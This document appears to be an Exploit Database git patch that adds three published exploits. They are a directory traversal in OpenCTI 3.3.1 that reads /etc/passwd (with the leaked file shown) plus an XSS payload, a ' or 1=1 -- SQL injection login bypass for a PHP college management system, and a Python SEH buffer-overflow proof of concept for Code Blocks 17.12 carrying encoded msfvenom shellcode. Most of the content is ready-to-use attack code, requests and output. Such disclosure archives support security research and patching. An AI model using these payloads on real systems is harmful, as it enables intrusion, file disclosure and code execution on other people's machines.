From 7312a8330de86e9097f803ce5b42df072b01855d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 18 Jun 2020 05:01:57 +0000 Subject: [PATCH] DB: 2020-06-18 3 changes to exploits/shellcodes Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) College-Management-System-Php 1.0 - Authentication Bypass OpenCTI 3.3.1 - Directory Traversal --- exploits/multiple/webapps/48595.txt | 100 ++++++++++++++++++++++++++ exploits/php/webapps/48593.txt | 35 +++++++++ exploits/windows/local/48594.py | 108 ++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 246 insertions(+) create mode 100644 exploits/multiple/webapps/48595.txt create mode 100644 exploits/php/webapps/48593.txt create mode 100755 exploits/windows/local/48594.py diff --git a/exploits/multiple/webapps/48595.txt b/exploits/multiple/webapps/48595.txt new file mode 100644 index 000000000..e0462aaf9 --- /dev/null +++ b/exploits/multiple/webapps/48595.txt @@ -0,0 +1,100 @@ +# Exploit Title: OpenCTI 3.3.1 - Directory Traversal +# Date: 2020-03-05 +# Exploit Author: Raif Berkay Dincel +# Vendor Homepage: www.opencti.io/ +# Software [https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1] +# Version: [3.3.1] +# CVE-ID: N/A +# Tested on: Linux Mint / Windows 10 +# Vulnerabilities Discovered Date : 2020/03/05 [YYYY/MM/DD] + +# As a result of the research, two vulnerability were identified. (Directory Traversal & Cross Site Scripting [XSS]) +# Technical information is provided below step by step. + +# [1] - Directory Traversal Vulnerability + +# Vulnerable Parameter Type: GET +# Vulnerable Parameter: TARGET/static/css/[Payload] + +# Proof of Concepts: +https://TARGET/static/css//../../../../../../../../etc/passwd + +# HTTP Request: + +GET /static/css//../../../../../../../../etc/passwd HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: connect.sid=s%3ATkG_XOPI-x4FclzoLAZvx_oBEHaTkG4N.kwp3h9LAyBrG03SzzT8ApZu0CRaUwI5CP7yizXTerYM; opencti_token=df8635b1-39b5-41c2-8873-2f19b0e6ca8c +Upgrade-Insecure-Requests: 1 + +# HTTP Response + +HTTP/1.1 200 OK +X-DNS-Prefetch-Control: off +X-Frame-Options: SAMEORIGIN +Strict-Transport-Security: max-age=15552000; includeSubDomains +X-Download-Options: noopen +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +Content-Type: text/css; charset=utf-8 +ETag: W/"500-eiHlcjY0lWovE9oQsRof3WWtG1o" +Vary: Accept-Encoding +Date: Sun, 03 May 2020 01:25:21 GMT +Connection: close +Content-Length: 1280 + +root:x:0:0:root:/root:/bin/ash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/usr/lib/news:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +man:x:13:15:man:/usr/man:/sbin/nologin +postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin +cron:x:16:16:cron:/var/spool/cron:/sbin/nologin +ftp:x:21:21::/var/lib/ftp:/sbin/nologin +sshd:x:22:22:sshd:/dev/null:/sbin/nologin +at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin +squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin +xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin +games:x:35:35:games:/usr/games:/sbin/nologin +postgres:x:70:70::/var/lib/postgresql:/bin/sh +cyrus:x:85:12::/usr/cyrus:/sbin/nologin +vpopmail:x:89:89::/var/vpopmail:/sbin/nologin +ntp:x:123:123:NTP:/var/empty:/sbin/nologin +smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin +guest:x:405:100:guest:/dev/null:/sbin/nologin +nobody:x:65534:65534:nobody:/:/sbin/nologin +node:x:1000:1000:Linux User,,,:/home/node:/bin/sh + + +# [2] - Cross Site Scripting (XSS) Vulnerability + +# Vulnerable Parameter Type: GET +# Vulnerable Parameter: TARGET/graphql?[Payload] + +# Proof of Concepts: +TARGET/graphql?'"--> + +https://TARGET/graphql?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27Raif_Berkay%27)%3C/scRipt%3E + +# HTTP Request: + +GET /graphql?'"--> HTTP/1.1 +Host: TARGET +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-us,en;q=0.5 +Cache-Control: no-cache +Cookie: opencti_token=2b4f29e3-5ea8-4890-8cf5-a76f61f1e2b2; connect.sid=s%3AB8USExilsGXulGOc09fo92piRjpWNtUo.GZ9pmhOf7i1l78t%2BHVk9zh9AQ9BTO%2BHvCRix3iXv6iw +User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 \ No newline at end of file diff --git a/exploits/php/webapps/48593.txt b/exploits/php/webapps/48593.txt new file mode 100644 index 000000000..030e45e0c --- /dev/null +++ b/exploits/php/webapps/48593.txt @@ -0,0 +1,35 @@ +# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection +# Exploit Author: BLAY ABU SAFIAN (Inveteck Global) +# Website: https://github.com/olotieno/College-Management-System-Php +# Date: 2020-06-16 +# Google Dork: N/A +# Vendor: https://github.com/olotieno/ +# Software Link: https://github.com/olotieno/College-Management-System-Php.git +# Affected Version: N/A +# Patched Version: unpatched +# Category: Web Application +# Tested on: MAC + +The College Management System Php suffers from sql injection vulnerabilities in the index.php page: + +$msg=""; +if(isset($_POST['btn_log'])){ + $uname=$_POST['unametxt']; + $pwd=$_POST['pwdtxt']; + + $sql=mysqli_query($con,"SELECT * FROM users_tbl + WHERE username='$uname' AND password='$pwd' + +SQL injection vulnerability:- +in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability + +payload: +' or 1=1 -- + + + +Thank you + +regards +Abu Safian Blay +https://inveteckglobal.com \ No newline at end of file diff --git a/exploits/windows/local/48594.py b/exploits/windows/local/48594.py new file mode 100755 index 000000000..11992f74c --- /dev/null +++ b/exploits/windows/local/48594.py @@ -0,0 +1,108 @@ +# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) +# Vendor Homepage: http://www.codeblocks.org/ +# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-16 +# Vulnerable Software: Code Blocks +# Version: 17.12 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: codeblocks.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for codeblocks.exe +# 4.- Open "codeblocks.exe" +# 5.- Go to "File" > "New" > "Project..." +# 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next" +# 7.- Paste ClipBoard into the "Filename with fullpath:" . +# 8.- Click on "Finish". +# 9.- Calc.exe runs. + + +################################################################################################################################################# + +#Python "codeblocks.py" Code: + +f= open("codeblocks.txt", "w") + +junk1="A" * 2006 + + +nseh="\x61\x62" #popad / align + + +#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe +seh="\xe0\x50" + +ven = "\x62" #align +ven +="\x53" #push ebx +ven += "\x62" #align +ven += "\x58" #pop eax +ven += "\x62" #align +ven += "\x05\x14\x11" #add eax, 0x11001400 +ven += "\x62" #align +ven += "\x2d\x13\x11" #sub eax, 0x11001300 +ven += "\x62" #align + +ven += "\x50" #push eax +ven += "\x62" #align +ven += "\xc3" #ret + +junk2="\x41" * 108 #required to make sure shellcode = eax + +#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX +buf = "" +buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72" +buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50" +buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b" +buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52" +buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31" +buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c" +buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37" +buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a" +buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71" +buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34" +buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79" +buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52" +buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71" +buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30" +buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d" +buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c" +buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b" +buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b" +buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34" +buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32" +buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b" +buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64" +buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30" +buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66" +buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78" +buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d" +buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70" +buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52" +buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43" +buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53" +buf += "\x35\x6d\x30\x41\x41" + + + + +junk3 = "\x62" * 5000 #padding to crash + + + +payload = junk1 + nseh + seh + ven + junk2 + buf +junk3 + +f.write(payload) +f.close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cc0ec866d..f01140a68 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11095,6 +11095,7 @@ id,file,description,date,author,type,platform,port 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows, +48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42811,3 +42812,5 @@ id,file,description,date,author,type,platform,port 48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple, 48588,exploits/hardware/webapps/48588.py,"Netgear R7000 Router - Remote Code Execution",2020-06-15,grimm-co,webapps,hardware, 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php, +48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php, +48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple,